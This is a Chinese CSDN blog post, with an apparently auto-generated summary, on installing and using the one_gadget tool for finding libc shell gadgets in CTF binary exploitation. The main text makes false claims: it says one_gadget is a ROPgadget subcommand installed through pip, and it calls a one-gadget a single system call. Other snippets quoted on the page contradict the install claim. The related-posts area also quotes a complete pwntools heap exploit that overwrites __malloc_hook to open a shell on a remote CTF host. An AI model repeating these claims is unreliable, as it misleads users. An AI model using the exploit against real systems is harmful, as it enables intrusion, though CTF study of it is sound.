one_gadget使用

最新推荐文章于 2024-06-14 10:13:22 发布
最新推荐文章于 2024-06-14 10:13:22 发布
阅读量585 收藏 10
点赞数 4
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jingged/article/details/137541244
版权
本文介绍了one_gadget,一个在二进制文件分析中寻找潜在远程代码执行(RCE)漏洞的工具。文章详细阐述了如何安装、使用和分析one_gadget,以及其在查找和利用one-gadget利用点中的关键作用。
摘要由CSDN通过智能技术生成

 

one_gadget 是一个在二进制分析(尤其是利用分析)中常用的工具,它用于查找在给定二进制文件中可能存在的 "one-gadget" RCE(Remote Code Execution,远程代码执行)利用点。这些 "one-gadget" 通常指的是单个系统调用,当被正确利用时,能够直接赋予攻击者远程代码执行的能力,而无需链式利用多个漏洞。

以下是使用 one_gadget 的一些基本步骤:

1.安装

首先,你需要安装 one_gadget。这通常是通过 ROPgadget 工具集来完成的,因为 one_gadgetROPgadget 的一个子命令。你可以使用 pip 来安装 ROPgadget

pip install ropgadget

 2.查找 one-gadget

使用 one_gadget 命令,并指定要分析的二进制文件作为参数。例如:

one_gadget /path/to/binary

这将列出在给定二进制文件中找到的所有可能的 "one-gadget" 利用点。

3.分析

查看 one_gadget 的输出,分析哪些利用点可能是可利用的。通常,你需要查看这些利用点是否可以被你的攻击场景所触发,以及是否满足所需的条件(例如,正确的参数、权限等)。

4.利用

如果你找到了一个可利用的 "one-gadget",那么下一步就是构建一个利用链来触发这个利用点。这通常涉及到对二进制文件进行ROP(Return-Oriented Programming,返回导向编程)或JOP(Jump-Oriented Programming,跳转导向编程)分析,以找到一系列的代码片段(称为 gadgets),这些代码片段可以被链接起来以执行所需的攻击。

5.测试

在构建完利用链后,对其进行测试以确保其有效性。这通常涉及到在受控的环境中模拟攻击场景,并观察是否能成功触发利用并获得预期的效果。

需要注意的是,one_gadget 只是一个辅助工具,用于查找可能的利用点。成功利用一个 "one-gadget" 通常需要深入理解和分析目标二进制文件的行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的 "one-gadget" 利用点可能会变得越来越少。因此,在使用 one_gadget 时,最好将其与其他工具和技术结合起来,以进行更全面的二进制分析和利用开发。

one_gadget 的使用说明如下:

用法:one_gadget <FILE|-b BuildID> [options]

选项:

    -b, --build-id BuildID:libc 的 BuildID(sha1 哈希)。
    -f, --[no-]force-file:强制在文件中搜索 gadgets,而不是首先使用 build ID。
    -l, --level OUTPUT_LEVEL:输出级别。
    one_gadget 会自动选择具有较高成功概率的 gadgets。
    增加这个级别可以让 one_gadget 显示它找到的更多 gadgets。
    默认值:0
    -n, --near FUNCTIONS/FILE:根据给定的函数或给定文件的 GOT 函数,按 gadgets 与它们的距离排序。
    -r, --[no-]raw:仅输出 gadgets 的偏移量,用空格分隔。
    -s, --script exploit-script:使用所有可能的 gadgets 运行漏洞利用脚本。
    脚本将以 'exploit-script $offset' 的形式运行。
    --info BuildID:给定 BuildID,显示版本信息。
    --base BASE_ADDRESS:libc 的基地址。
    默认值:0
    --version:显示当前 gem 版本。

翻译解释:

one_gadget 是一个用于在二进制文件中查找可能存在的 "one-gadget" 利用点的工具。"one-gadget" 通常指的是单个系统调用,当正确利用时,能够赋予攻击者远程代码执行的能力。

使用 one_gadget 时,你需要指定一个二进制文件或 libc 的 BuildID 作为输入。然后,你可以使用各种选项来调整搜索行为和输出格式。例如,-b 选项允许你通过 BuildID 指定 libc 库,而 -l 选项则用于控制输出级别,以显示更多或更少的 gadgets。

-n 选项允许你根据给定的函数或文件与 gadgets 的距离来排序输出,这对于某些特定的攻击场景可能很有用。

-r 选项用于仅输出 gadgets 的偏移量,这在某些自动化脚本或工具中可能很有用。

-s 选项允许你指定一个脚本,该脚本将使用所有找到的 gadgets 作为输入进行运行,这对于自动化漏洞利用测试可能很有用。

最后,--info 和 --version 选项分别用于显示版本信息和当前 gem 的版本。

Young Jing
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
one_gadget用法|攻防世界pwn进阶区babystack
Kni9hT's Blog
03-25 8141
文章目录0x00.检查保护 0x00.检查保护 devil@ubuntu:~/adworld/pwn$ checksec babystack [*] '/home/devil/adworld/pwn/babystack' Arch: amd64-64-little RELRO: Full RELRO ;无法修改got表 Stack: Canary fou...
安装one_gadget
liucc09的博客
01-09 879
install 卸载已有ruby和one_gadget sudo gem uninstall one_gadget sudo apt remove gem ruby 安装ruby-install wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ruby-install-0.
[BJDCTF 2nd]one_gadget
weixin_45948183的博客
03-31 649
到ida看一下伪代码 函数输出了printf的地址,给了libc,利用one_gadget就可以的到libc的基址 这里需要自己试一下,这里是最后一个gadget from pwn import * p=remote('node3.buuoj.cn',25100) elf=ELF('./one_gadget') context.log_level='debug' libc = ELF('./l...
onegadget安装
最新发布
sagic的博客
06-14 113
安装onegadget
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 321
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
one_gadget的安装与使用
weixin_62675330的博客
03-04 4130
0x0 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 没有ROP_gadget的赶快了。 ROP_gadget 下载安装与使用 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 one_gadget 是libc中存在的一些执行execve(“bin/sh",NULL,NULL)的片段。当我们知道libc的版本,并且通过信息泄露得到libc的基址,就可以通过控制EIP/RIP( 覆盖.go
one_gadget
Trick的博客
11-27 545
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
ubuntu16.04 编译安装ruby环境、onegadget
Tw0的博客
01-24 1118
ubuntu16.04 安装one_gadget
reggelre 闹钟 .gadget
05-04
2、闹钟设置:options——〉 Alarm mode第一项是Talk one time(只响一次);第二项是重复提醒直至点击。第三项可以选择闹铃,点击右侧的文件夹图标,选择音频文件(播放时调用系统默认播放器)。3、设置播音文件,...
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您... 符号断点杂项libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。安装您有两种使用welpwn 。通过安装从0.9.3版本开始已添加setup.py 。
x2KML_ver1.0.zip
04-22
(One can convert the GNSS/GPS/ Beidou Positioning Data, NMEA0183 file format for the KML/KMZ gadget, windows system supports standard, convert the data generated with location information, track ...
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 810
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
wuyvle的博客
02-06 157
64位,放进ida看看 看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法 用onegadget看看libc one_gadget libc-2.29.so 发现 写脚本 from pwn import * r=remote("node3.buuoj.cn",27772) elf=ELF("./one_gadget") libc=ELF('libc-2.29.so') one_gadget1=[0xe237f,0xe2383,0xe2386,0x106ef
标题:快速实现RCE:探索OneGadget——你的动态链接库(RCE)神器
gitblog_00027的博客
05-12 273
标题:快速实现RCE:探索OneGadget——你的动态链接库(RCE)神器 项目地址:https://gitcode.com/david942j/one_gadget 1. 项目介绍 OneGadget是一个小巧且强大的Ruby gem,专为CTF(Pwn类型)挑战设计,它能帮助你迅速找到执行execve('/bin/sh', NULL, NULL)的单个指令序列,即所谓的“one-gadget...
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8063
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
one_gadget不能搜索libc2.31及以上版本解决
qq_39153421的博客
04-14 840
更新ruby 首先卸载已有的ruby、onegadget: sudo gem uninstall one_gadget sudo apt remove gem ruby 下载ruby-install安装,由他来安装或升级ruby wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ru
import os from pwn import * context(log_level='debug',os='linux',arch='amd64') # p = process('./1') p = remote("59.110.164.72",10027) #p = process(['/home/lin/tools/glibc-all-in-one-master/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./1'], env = {'LD_PRELOAD' : './libc-2.23.so'}) elf=ELF('./1') libc=ELF('./libc-2.23.so') def menu(choice):     p.sendlineafter(b"Your choice :",str(choice)) menu(1) def create(size,com):     menu(1)     # menu(1)     p.sendlineafter(b"Damage of skill : ",str(size))     p.sendlineafter(b"introduction of skill:",com) def edit_1(idx,size):     menu(2)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"Damage of skill : ",str(size)) def edit_intro(idx,com):     menu(3)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"introduction of skill : ",com) def show(idx):     menu(4)     p.sendlineafter(b"Index :",str(idx)) def delete(idx):     menu(5)     p.sendlineafter(b"Index :",str(idx)) create(0x38,b'a'*0x38) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) # gdb.attach(p) delete(3) edit_intro(0,b"b"*0x38+b"\xb1") delete(1) create(0x40,b"") show(1) p.recvuntil("Introduction : ") libc_base = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0x3c4c0a print (hex(libc_base)) malloc_hook = libc_base + libc.symbols['__malloc_hook']-0x23 print (hex(malloc_hook)) one = [0x45226,0x4527a,0xf03a4,0xf1247] one_gadget = libc_base + one[3] print (hex(one_gadget)) edit_intro(1,p64(0)*3+p64(0x71)+p64(malloc_hook)) delete(0) delete(1) create(0x68,b"d"*8) # gdb.attach(p,"b *0x400cda") # pause() create(0x68,b"a"*19+p64(one_gadget)) menu(6) menu(2) ## get_shell p.interactive()这串代码的知识点
06-01
这段代码主要使用了 pwntools 库来和程序进行交互,利用了程序中的漏洞来进行攻击。攻击的主要过程是: 1.创建四个技能,然后删除第三个技能。 2.编辑第一个技能的简介,将其覆盖为一段长度为 0x38 的字符串加上一个字节为 0xb1 的字符。 3.删除第一个技能,并创建一个长度为 0x40 的新技能。 4.读取第二个技能的简介,从中获取了程序运行时的 libc 基地址。 5.计算了一个函数的地址,然后将第二个技能的简介重新编辑,将其覆盖为一段长度为 0x20 的字符串加上一个指向 malloc_hook 的指针。 6.删除了第一个和第二个技能,并创建了两个新技能,最后触发了程序中的一个函数,从而获得了 shell。 这个攻击使用了 libc 中的一些函数和常量,例如 malloc_hook 和 one_gadget。同时,攻击中还用到了 pwntools 库中的一些函数,例如 remote、sendlineafter 和 recvuntil。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值